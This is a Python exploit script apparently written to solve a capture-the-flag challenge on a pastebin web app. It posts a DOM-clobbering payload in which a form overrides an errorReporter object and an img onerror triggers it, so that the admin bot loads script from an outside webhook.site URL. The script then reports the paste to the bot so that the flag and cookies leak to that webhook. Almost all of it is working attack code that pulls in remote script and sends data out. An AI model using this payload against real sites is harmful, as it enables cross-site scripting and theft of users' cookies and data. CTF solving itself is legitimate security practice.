import requests

BASE_URL = "https://pasteboard-1fb68b7836775bea.chals.uoftctf.org"
WEBHOOK = "https://webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078"

# The winning payload: Use form to clobber errorReporter with a nested path value
# This exploits: c.path && c.path.value ? c.path.value : String(c.path)
payload = f'''<form id="errorReporter">
<input name="path" value="//webhook.site/d8111fd3-599a-47ab-bcab-94d5ec54e078/x.js?flag=">
</form>
<img src=x onerror="window.lastRenderError='trigger';throw Error()">'''

print(f"[*] Creating paste with DOM clobbering payload...")
print(f"[*] This will make the bot load script from: //webhook.site/.../x.js?flag=")

session = requests.Session()
response = session.post(
    f"{BASE_URL}/note/new",
    data={"title": "DOM Clobber", "body": payload},
    allow_redirects=False
)

if response.status_code == 302:
    location = response.headers.get('Location')
    note_url = f"{BASE_URL}{location}"
    print(f"[+] Paste created: {note_url}")
    print(f"[*] You can test it manually by visiting: {note_url}")
    
    report_response = session.post(f"{BASE_URL}/report", data={"url": location})
    if report_response.status_code == 202:
        print(f"[+] Reported to bot!")
        print(f"[*] Check webhook in 30-40 seconds: https://webhook.site/#!/d8111fd3-599a-47ab-bcab-94d5ec54e078")
        print(f"[*] Look for a GET request to /x.js?flag= with cookies in the Referer header")
    else:
        print(f"[-] Failed to report: {report_response.status_code}")
else:
    print(f"[-] Failed to create paste: {response.status_code}")